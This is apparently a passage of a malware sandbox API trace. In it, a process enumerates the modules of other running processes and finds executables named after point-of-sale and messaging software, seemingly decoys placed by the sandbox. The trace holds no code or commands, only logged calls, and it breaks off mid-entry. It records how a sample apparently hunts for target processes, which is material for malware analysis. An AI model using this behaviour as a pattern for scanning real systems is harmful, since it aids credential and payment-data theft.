[0052.504] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0052.505] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0052.507] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x2604e50, cb=0x18 | out: lpmodinfo=0x2604e50*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0052.508] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0052.510] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0052.511] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2607010, cb=0x18 | out: lpmodinfo=0x2607010*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0052.514] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0052.515] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0052.517] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x26091d0, cb=0x18 | out: lpmodinfo=0x26091d0*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0052.518] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0052.520] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0052.522] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef40a0000, lpmodinfo=0x260b3a0, cb=0x18 | out: lpmodinfo=0x260b3a0*(lpBaseOfDll=0x7fef40a0000, SizeOfImage=0x11b000, EntryPoint=0x7fef4167b5c)) returned 1 [0052.523] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef40a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="fntcache.dll") returned 0xc [0052.525] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef40a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\fntcache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll")) returned 0x20 [0052.527] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa9e0000, lpmodinfo=0x260d570, cb=0x18 | out: lpmodinfo=0x260d570*(lpBaseOfDll=0x7fefa9e0000, SizeOfImage=0xa000, EntryPoint=0x7fefa9e260c)) returned 1 [0052.529] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa9e0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ktmw32.dll") returned 0xa [0052.531] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa9e0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0052.533] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x260f730, cb=0x18 | out: lpmodinfo=0x260f730*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0052.535] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0052.536] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0052.538] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x2611b08, cb=0x18 | out: lpmodinfo=0x2611b08*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0052.540] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0052.542] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0052.544] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2613cc8, cb=0x18 | out: lpmodinfo=0x2613cc8*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0052.546] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0052.548] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0052.549] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x2615e88, cb=0x18 | out: lpmodinfo=0x2615e88*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0052.551] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0052.553] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0052.555] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x2618048, cb=0x18 | out: lpmodinfo=0x2618048*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0052.557] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0052.559] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0052.561] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x261a220, cb=0x18 | out: lpmodinfo=0x261a220*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0052.563] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0052.566] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0052.568] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb38) returned 0x218 [0052.568] EnumProcessModules (in: hProcess=0x218, lphModule=0x261d430, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x261d430, lpcbNeeded=0x41eb20) returned 1 [0052.569] GetModuleInformation (in: hProcess=0x218, hModule=0xe10000, lpmodinfo=0x261d6a0, cb=0x18 | out: lpmodinfo=0x261d6a0*(lpBaseOfDll=0xe10000, SizeOfImage=0x17000, EntryPoint=0xe114a1)) returned 1 [0052.569] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xe10000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="bitkinex.exe") returned 0xc [0052.569] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xe10000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Office\\bitkinex.exe" (normalized: "c:\\program files\\microsoft office\\bitkinex.exe")) returned 0x2e [0052.569] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x261f8c0, cb=0x18 | out: lpmodinfo=0x261f8c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.570] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.570] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.570] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2621a80, cb=0x18 | out: lpmodinfo=0x2621a80*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.571] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.571] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.571] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2623c40, cb=0x18 | out: lpmodinfo=0x2623c40*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.572] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.572] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.572] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2625e10, cb=0x18 | out: lpmodinfo=0x2625e10*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.573] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.573] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.574] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x218 [0052.574] EnumProcessModules (in: hProcess=0x218, lphModule=0x2628538, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2628538, lpcbNeeded=0x41eb20) returned 1 [0052.575] GetModuleInformation (in: hProcess=0x218, hModule=0x300000, lpmodinfo=0x26287a8, cb=0x18 | out: lpmodinfo=0x26287a8*(lpBaseOfDll=0x300000, SizeOfImage=0x17000, EntryPoint=0x3014a1)) returned 1 [0052.576] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="trillian.exe") returned 0xc [0052.576] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\trillian.exe" (normalized: "c:\\program files (x86)\\common files\\trillian.exe")) returned 0x30 [0052.576] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x262a9d0, cb=0x18 | out: lpmodinfo=0x262a9d0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.576] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.577] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.577] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x262cb90, cb=0x18 | out: lpmodinfo=0x262cb90*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.577] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.578] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.578] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x262ed50, cb=0x18 | out: lpmodinfo=0x262ed50*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.578] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.579] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.579] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2630f20, cb=0x18 | out: lpmodinfo=0x2630f20*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.580] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.580] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.581] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x218 [0052.581] EnumProcessModules (in: hProcess=0x218, lphModule=0x2633630, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2633630, lpcbNeeded=0x41eb20) returned 1 [0052.581] GetModuleInformation (in: hProcess=0x218, hModule=0x9a0000, lpmodinfo=0x26338a0, cb=0x18 | out: lpmodinfo=0x26338a0*(lpBaseOfDll=0x9a0000, SizeOfImage=0x17000, EntryPoint=0x9a14a1)) returned 1 [0052.582] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x9a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="new-official.exe") returned 0x10 [0052.582] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x9a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows NT\\new-official.exe" (normalized: "c:\\program files\\windows nt\\new-official.exe")) returned 0x2c [0052.582] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2635ac8, cb=0x18 | out: lpmodinfo=0x2635ac8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.582] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.583] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.583] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2637c88, cb=0x18 | out: lpmodinfo=0x2637c88*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.583] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.584] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.584] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2639e48, cb=0x18 | out: lpmodinfo=0x2639e48*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.584] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.585] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.585] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x263c018, cb=0x18 | out: lpmodinfo=0x263c018*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.586] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.586] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d0) returned 0x218 [0052.587] EnumProcessModules (in: hProcess=0x218, lphModule=0x263e740, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x263e740, lpcbNeeded=0x41eb20) returned 1 [0052.587] GetModuleInformation (in: hProcess=0x218, hModule=0x2e0000, lpmodinfo=0x263e9b0, cb=0x18 | out: lpmodinfo=0x263e9b0*(lpBaseOfDll=0x2e0000, SizeOfImage=0x17000, EntryPoint=0x2e14a1)) returned 1 [0052.587] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x2e0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="aldelo.exe") returned 0xa [0052.588] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x2e0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\aldelo.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\aldelo.exe")) returned 0x31 [0052.588] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2640bd0, cb=0x18 | out: lpmodinfo=0x2640bd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.588] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.589] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.589] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2642d90, cb=0x18 | out: lpmodinfo=0x2642d90*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.589] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.590] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.590] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2644f50, cb=0x18 | out: lpmodinfo=0x2644f50*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.591] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.591] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.591] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2647120, cb=0x18 | out: lpmodinfo=0x2647120*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.592] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.592] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x758) returned 0x218 [0052.593] EnumProcessModules (in: hProcess=0x218, lphModule=0x2649830, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2649830, lpcbNeeded=0x41eb20) returned 1 [0052.593] GetModuleInformation (in: hProcess=0x218, hModule=0x170000, lpmodinfo=0x2649aa0, cb=0x18 | out: lpmodinfo=0x2649aa0*(lpBaseOfDll=0x170000, SizeOfImage=0x17000, EntryPoint=0x1714a1)) returned 1 [0052.594] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x170000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="accupos.exe") returned 0xb [0052.594] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x170000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\DVD Maker\\accupos.exe" (normalized: "c:\\program files\\dvd maker\\accupos.exe")) returned 0x26 [0052.594] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x264bca8, cb=0x18 | out: lpmodinfo=0x264bca8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.594] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.595] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.595] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x264de68, cb=0x18 | out: lpmodinfo=0x264de68*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.595] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.596] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.596] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2650028, cb=0x18 | out: lpmodinfo=0x2650028*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.596] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.597] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.597] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2652210, cb=0x18 | out: lpmodinfo=0x2652210*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.598] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.598] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.599] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb30) returned 0x218 [0052.599] EnumProcessModules (in: hProcess=0x218, lphModule=0x2654920, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2654920, lpcbNeeded=0x41eb20) returned 1 [0052.599] GetModuleInformation (in: hProcess=0x218, hModule=0x10a0000, lpmodinfo=0x2654b90, cb=0x18 | out: lpmodinfo=0x2654b90*(lpBaseOfDll=0x10a0000, SizeOfImage=0x17000, EntryPoint=0x10a14a1)) returned 1 [0052.599] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x10a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="barca.exe") returned 0x9 [0052.600] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x10a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\barca.exe" (normalized: "c:\\program files\\reference assemblies\\barca.exe")) returned 0x2f [0052.600] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2656da8, cb=0x18 | out: lpmodinfo=0x2656da8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.600] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.600] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.601] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2658f68, cb=0x18 | out: lpmodinfo=0x2658f68*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.601] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.601] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.602] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x265b128, cb=0x18 | out: lpmodinfo=0x265b128*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.602] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.603] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.603] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x265d2f8, cb=0x18 | out: lpmodinfo=0x265d2f8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.603] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: 